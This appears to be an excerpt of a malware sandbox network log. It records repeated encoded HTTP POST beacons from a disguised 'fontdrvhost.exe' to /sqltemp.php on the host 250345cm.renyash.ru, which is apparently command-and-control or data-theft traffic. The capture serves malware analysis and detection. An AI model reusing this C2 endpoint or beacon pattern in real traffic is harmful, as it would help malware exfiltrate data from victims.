Jan 1, 2025 14:53:08.150784016 CET	800	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkTBELDQghU0JIXSEIytL7qiUEgp6uIlHqkBZI4OLECwitH3dpyrGqKFjWyusMo3rv%2B0gDPvTxXTVfSSXvfRP947aDccOOlDCq52UiFd6nNuhfaDr0w7w26GmzTDbYV4WfNaHXkF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe67fb8c43eb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3900&min_rtt=1699&rtt_var=5039&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=75612&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49921	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:08.424881935 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:08.777205944 CET	1012	OUT	Data Raw: 56 50 5a 51 54 5f 54 57 58 56 52 59 56 5a 59 51 5b 58 54 5f 55 5a 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VPZQT_TWXVRYVZYQ[XT_UZP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^3"4%3#;#<^+V> !10+;5B2?89*&Y.,Y--
Jan 1, 2025 14:53:08.873054028 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:09.134896994 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CovKArH8aN5QnTtLB%2Bi5BE6C286YiyM2bysk2Iaq0tNQQ0t8tDNDvPi4ItnQ0Slt%2FZlve1UHC3y7IDOf5cECtao9r02nlVh0reLE6KeKHrmsVcUdZBITvQCCNhLejDW2jRksYYUW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe6e29745e7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4436&min_rtt=1721&rtt_var=6075&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=62284&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49927	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:09.259058952 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:09.605319977 CET	1012	OUT	Data Raw: 56 5f 5f 5c 54 59 54 56 58 56 52 59 56 50 59 57 5b 53 54 5c 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__\TYTVXVRYVPYW[ST\U]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z&/X Y='.'@;9T#/+S)8[#2+Z(%/4-&Y.,Y-
Jan 1, 2025 14:53:09.708282948 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:09.889786959 CET	797	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uj1sI4UnIc0gFeYKQvkkcsRVJb42pCqsVyQFJgIub3czBWy1KKY0WN5Vzu4OneYDVuXxCieaBcUmUUnGw0E2HxU4S1c8zfC9EBBYLU1ysRpEXBC46wmj0uLKGENAr250248zvO0t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe73690c4375-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=2392&rtt_var=4555&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=85746&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49933	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:10.010606050 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:10.355782986 CET	1012	OUT	Data Raw: 56 57 5f 53 51 5c 54 50 58 56 52 59 56 51 59 52 5b 5a 54 58 55 5a 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_SQ\TPXVRYVQYR[ZTXUZP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0=4Y2$X7@;=R!=?:<(.<Y#Z?2??::&Y.,Y-
Jan 1, 2025 14:53:10.463035107 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:10.645745993 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3nBjNQcEQN%2F1VyhfON2f7GyFPDU%2BXZ%2F87MFb84fHfLWpC5DRDXKHguo%2BNSgTTJVyRh0yR65jKIkLyE0kMXXdnxHY6sWSibZqfkrdhpgFx1PInnHOpCgFlQqSWcElGohZCgGH%2Fe2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe781a5441ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3142&min_rtt=1684&rtt_var=3549&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=109322&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49940	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:10.986078024 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49944	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:11.283698082 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:11.636672974 CET	1852	OUT	Data Raw: 56 53 5f 51 54 5f 51 55 58 56 52 59 56 5b 59 55 5b 5b 54 5e 55 5f 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VS_QT_QUXVRYV[YU[[T^U_P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3?>",!3>'.)& -Y<_?S);#!3Z+8=E&/8-:&Y.,Y-)
Jan 1, 2025 14:53:11.731230021 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:11.914792061 CET	959	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6h90KI4AKs2LmKdB%2BmPd2LRVD1G3SuKaap49eZpmHy6qPam3JrReHymzEnFzj9aaJka1FHS5dL%2FpKqaT9BJROuOw3y8Ou%2FPWU4HHjSjPEX2kl9uFOn%2FyTsBf4epk0%2BqOKIknI%2Bt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe8008718c41-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4854&min_rtt=1912&rtt_var=6602&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=57360&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 09 29 3d 29 0e 31 31 3b 01 2a 3e 2f 56 32 2d 32 58 3f 38 31 05 33 00 0d 11 28 29 0d 1e 36 3f 2d 59 24 3b 33 07 37 13 28 03 27 34 2b 59 05 1c 20 43 35 3f 01 07 29 03 09 58 26 2c 35 5b 26 3d 37 06 2a 3b 23 0c 20 15 33 1d 33 03 33 01 2a 03 30 1e 30 12 2c 02 3a 3f 07 53 27 3a 2c 54 00 11 26 55 27 1f 28 14 20 0e 3b 03 36 08 36 00 25 1d 35 0a 26 02 23 50 37 07 08 5c 32 0b 27 59 22 23 2e 5e 26 5d 21 58 21 2e 28 0a 29 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&)=)11;>/V2-2X?813()6?-Y$;37('4+Y C5?)X&,5[&=7;# 333*00,:?S':,T&U'( ;66%5&#P7\2'Y"#.^&]!X!.().%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49946	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:11.400451899 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:11.746112108 CET	1012	OUT	Data Raw: 56 55 5f 55 54 5a 54 57 58 56 52 59 56 5f 59 53 5b 53 54 50 55 5d 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VU_UTZTWXVRYV_YS[STPU]P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^3/: <2%.A/-#=,+4)' ?2;.&Y.,Y-9
Jan 1, 2025 14:53:11.847465992 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:12.111871004 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AE7e12Xb6oR%2FCg2CAyf9AwqxLQoT5W8rLq%2FgID8eXXINhqvsksmqud9snMkLAmKGx8j7pD81qV2uQoa0dh6%2FdoFwvo5hPMEQWAJyVWTN2EQrF8GHPrj7wPGxiEOHPrxhNiHFoMHW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe80ca930c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3731&min_rtt=1654&rtt_var=4775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=79894&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49952	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:12.227947950 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:12.574110031 CET	1012	OUT	Data Raw: 53 53 5f 53 54 5a 51 56 58 56 52 59 56 5e 59 54 5b 58 54 59 55 54 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_STZQVXVRYV^YT[XTYUTPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0Y!Z Y9_0=#D,!-<3)>X 7Y<.1?S::&Y.,Y-
Jan 1, 2025 14:53:12.676281929 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:12.947933912 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5cCJymIJJll%2F2l8k%2F8jXDwweJgXAHnsCmXCw2OLvbilEd9i8rkZ%2BgYO%2BiVhbfPNgbe6aqh2qND4FdSkXQolQaYr7BXWcZl9ea1vV3B9cnIjKQdsnCUBmoJL36hllFNb8U8FcvW7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe85fc5d42df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4171&min_rtt=2143&rtt_var=4859&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=79490&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49958	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:13.072679043 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:13.419900894 CET	1012	OUT	Data Raw: 53 57 5a 56 54 51 51 57 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZVTQQWXVRYV[YT[^T[UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y0![ Y:'.'.1T#+7) Y723[?"2+R.&Y.,Y-)
Jan 1, 2025 14:53:13.537457943 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:13.793407917 CET	801	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ni8yvXzZRSN1K3UjdqWLN1NOOmyH7kEV4viZEqWBmyMmig3wchjP4YBmgKj2PUt%2BM0HZzb5BdK9tLzHE24hGA7kCdSgqvPBtCPjt3TDuCkdsdbLWCKttErbzcLCqtuhyMIV8IHNx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe8b4f830f65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7803&min_rtt=1467&rtt_var=13223&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27991&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49964	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:13.976294994 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:14.324165106 CET	1012	OUT	Data Raw: 56 51 5f 57 51 5d 54 54 58 56 52 59 56 5b 59 51 5b 5a 54 59 55 5f 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_WQ]TTXVRYV[YQ[ZTYU_P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&?9[ /!3E;.#$[(:4(=<]4"7(+%<?T,:&Y.,Y-)
Jan 1, 2025 14:53:14.428893089 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:14.694446087 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lu8z%2BQsTVTiRmpy%2F69dPknZYxT8I4tuLjBrNOvb5ijd3TBztZ7yZNvjpkhvFoPsfbZiB7uAi9Z1IZmOvq0qe7oAsNhrRaUOe3iwh%2FgVfxDu2%2FU%2BcEHO0GPr3InXkw7%2FQevX6fUYQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe90eaea0c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3516&min_rtt=1674&rtt_var=4312&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=88953&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49971	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:14.828062057 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:15.183478117 CET	1012	OUT	Data Raw: 53 54 5a 56 51 5f 54 51 58 56 52 59 56 5b 59 57 5b 5b 54 5d 55 5e 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZVQ_TQXVRYV[YW[[T]U^PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3?![41^$<.)>4=<Y(9<4"0+E27V-:&Y.,Y-)
Jan 1, 2025 14:53:15.299839020 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:15.480200052 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWqA95v6%2BJxphnwzhZ%2FmsbE7E2nBpTuLahMwW0N0pjkFvVSAEw5GEAQ9P7a%2FEa02tOyLQETBQogS1%2B93SRNH%2F3DULWMhi5%2FU4qieQvoI683WAbJIBUVCovINjGChJESiUUOKAWP%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe964fe04245-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4492&min_rtt=1665&rtt_var=6280&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=60114&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49977	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:15.603885889 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:15.949100018 CET	1012	OUT	Data Raw: 53 53 5f 52 54 5d 54 56 58 56 52 59 56 58 59 57 5b 59 54 50 55 58 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_RT]TVXVRYVXYW[YTPUXP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0<!X#1Y%-?B/\:#>#<_')!"<8%A2<9:&Y.,Y-%
Jan 1, 2025 14:53:16.048059940 CET	25	IN	HTTP/1.1 100 Continue
